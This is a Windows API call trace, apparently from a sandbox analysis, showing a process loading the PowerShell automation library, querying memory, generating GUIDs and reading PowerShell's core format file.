	[0531.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.160] VirtualQuery (in: lpAddress=0x1eb060, lpBuffer=0x1ebf20, dwLength=0x30 | out: lpBuffer=0x1ebf20*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.161] VirtualQuery (in: lpAddress=0x1eb0f0, lpBuffer=0x1ebfb0, dwLength=0x30 | out: lpBuffer=0x1ebfb0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.163] VirtualQuery (in: lpAddress=0x1eb870, lpBuffer=0x1ec730, dwLength=0x30 | out: lpBuffer=0x1ec730*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.164] VirtualQuery (in: lpAddress=0x1eb870, lpBuffer=0x1ec730, dwLength=0x30 | out: lpBuffer=0x1ec730*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.167] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf8a1ec14, Data2=0x92ff, Data3=0x4c57, Data4=([0]=0xba, [1]=0x1d, [2]=0x23, [3]=0xa0, [4]=0x3d, [5]=0x48, [6]=0x5b, [7]=0x66))) returned 0x0
	[0531.168] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc90fc3d6, Data2=0x3f9b, Data3=0x47d6, Data4=([0]=0x9a, [1]=0x30, [2]=0x9a, [3]=0x15, [4]=0x4e, [5]=0x9, [6]=0x21, [7]=0x30))) returned 0x0
	[0531.169] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xbf9313d9, Data2=0xcda6, Data3=0x4d59, Data4=([0]=0x81, [1]=0xb1, [2]=0x94, [3]=0xdb, [4]=0xe3, [5]=0xa5, [6]=0xc, [7]=0x1b))) returned 0x0
	[0531.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.181] VirtualQuery (in: lpAddress=0x1eb970, lpBuffer=0x1ec830, dwLength=0x30 | out: lpBuffer=0x1ec830*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0531.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.127] VirtualQuery (in: lpAddress=0x1eb060, lpBuffer=0x1ebf20, dwLength=0x30 | out: lpBuffer=0x1ebf20*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0532.128] VirtualQuery (in: lpAddress=0x1eb0f0, lpBuffer=0x1ebfb0, dwLength=0x30 | out: lpBuffer=0x1ebfb0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0532.130] VirtualQuery (in: lpAddress=0x1eb7d0, lpBuffer=0x1ec690, dwLength=0x30 | out: lpBuffer=0x1ec690*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0532.131] VirtualQuery (in: lpAddress=0x1eb860, lpBuffer=0x1ec720, dwLength=0x30 | out: lpBuffer=0x1ec720*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0532.134] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x6e8ddeff, Data2=0xefea, Data3=0x4f5d, Data4=([0]=0xa9, [1]=0x68, [2]=0xea, [3]=0x53, [4]=0x2, [5]=0xc0, [6]=0xd, [7]=0x37))) returned 0x0
	[0532.135] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb6ec5144, Data2=0x83ae, Data3=0x4648, Data4=([0]=0x83, [1]=0x3f, [2]=0xc5, [3]=0x69, [4]=0x29, [5]=0x75, [6]=0x18, [7]=0xa0))) returned 0x0
	[0532.135] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x97965eab, Data2=0x3249, Data3=0x4918, Data4=([0]=0xbb, [1]=0xbc, [2]=0xac, [3]=0x8f, [4]=0x36, [5]=0x12, [6]=0x9e, [7]=0x8d))) returned 0x0
	[0532.135] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc0b83656, Data2=0xd03a, Data3=0x4b8b, Data4=([0]=0x97, [1]=0xe9, [2]=0xac, [3]=0xef, [4]=0x9a, [5]=0x4a, [6]=0xf2, [7]=0x41))) returned 0x0
	[0532.136] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa159ad64, Data2=0x7c8c, Data3=0x42c5, Data4=([0]=0xab, [1]=0x6f, [2]=0x8e, [3]=0x84, [4]=0xd5, [5]=0x74, [6]=0xb9, [7]=0xa6))) returned 0x0
	[0532.136] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x30e4b39a, Data2=0xf221, Data3=0x4d73, Data4=([0]=0xb9, [1]=0x4, [2]=0xa9, [3]=0xd0, [4]=0x72, [5]=0x72, [6]=0xe5, [7]=0x59))) returned 0x0
	[0532.136] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc78c0062, Data2=0xf644, Data3=0x443a, Data4=([0]=0x89, [1]=0x3, [2]=0x36, [3]=0x88, [4]=0x75, [5]=0x17, [6]=0xab, [7]=0xd6))) returned 0x0
	[0532.137] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x55843de8, Data2=0x84ca, Data3=0x488f, Data4=([0]=0x84, [1]=0x3e, [2]=0x9, [3]=0x77, [4]=0x6e, [5]=0xf8, [6]=0x8e, [7]=0x8b))) returned 0x0
	[0532.137] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x91ffc238, Data2=0xf40, Data3=0x40a9, Data4=([0]=0xa7, [1]=0x84, [2]=0x9e, [3]=0x73, [4]=0xcf, [5]=0xe7, [6]=0x64, [7]=0xb0))) returned 0x0
	[0532.139] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x26e322f8, Data2=0x54ec, Data3=0x4071, Data4=([0]=0xb7, [1]=0xea, [2]=0x26, [3]=0x80, [4]=0xd6, [5]=0x8c, [6]=0x39, [7]=0xa1))) returned 0x0
	[0532.141] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x6298a50b, Data2=0x72e8, Data3=0x4d8a, Data4=([0]=0xbc, [1]=0x25, [2]=0xb1, [3]=0x75, [4]=0x71, [5]=0xa1, [6]=0xb6, [7]=0x1a))) returned 0x0
	[0532.143] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x96bdc042, Data2=0x76d7, Data3=0x4c13, Data4=([0]=0x92, [1]=0x60, [2]=0xfe, [3]=0xc3, [4]=0x95, [5]=0x25, [6]=0xf0, [7]=0x59))) returned 0x0
	[0532.143] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x8d3cc888, Data2=0xaab4, Data3=0x4719, Data4=([0]=0x9b, [1]=0x1, [2]=0xda, [3]=0x45, [4]=0x30, [5]=0xf1, [6]=0x9d, [7]=0x67))) returned 0x0
	[0532.143] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x9ffe22fd, Data2=0xa3c6, Data3=0x4dd1, Data4=([0]=0x81, [1]=0x72, [2]=0x4c, [3]=0x55, [4]=0xdb, [5]=0x79, [6]=0x97, [7]=0x65))) returned 0x0
	[0532.143] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x498d13c9, Data2=0xeb2c, Data3=0x43f8, Data4=([0]=0x82, [1]=0xa4, [2]=0xc0, [3]=0x97, [4]=0xe2, [5]=0x4d, [6]=0x49, [7]=0xdc))) returned 0x0
	[0532.144] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x34b67089, Data2=0x772e, Data3=0x4554, Data4=([0]=0x85, [1]=0x4a, [2]=0x51, [3]=0xbe, [4]=0xfd, [5]=0x16, [6]=0x36, [7]=0x64))) returned 0x0
	[0532.144] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x4e86288f, Data2=0xdc2e, Data3=0x4f2f, Data4=([0]=0xac, [1]=0x62, [2]=0xe1, [3]=0x53, [4]=0x9a, [5]=0xdd, [6]=0x2c, [7]=0x94))) returned 0x0
	[0532.144] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc7414bc, Data2=0x9d33, Data3=0x49e7, Data4=([0]=0xae, [1]=0x98, [2]=0x3f, [3]=0x3, [4]=0xfe, [5]=0x7a, [6]=0x2, [7]=0x40))) returned 0x0
	[0532.144] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xbddcd29f, Data2=0x44fe, Data3=0x4c92, Data4=([0]=0xa0, [1]=0x82, [2]=0x79, [3]=0xa4, [4]=0xc9, [5]=0x99, [6]=0x71, [7]=0x2e))) returned 0x0
	[0532.145] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0532.145] GetFileType (hFile=0x2dc) returned 0x1
	[0532.145] SetErrorMode (uMode=0x1) returned 0x1
	[0532.145] GetFileType (hFile=0x2dc) returned 0x1
	[0532.145] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.146] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.146] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.147] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.147] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.148] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.148] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.148] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.148] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.149] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.149] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.150] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.150] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.150] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.150] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.151] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
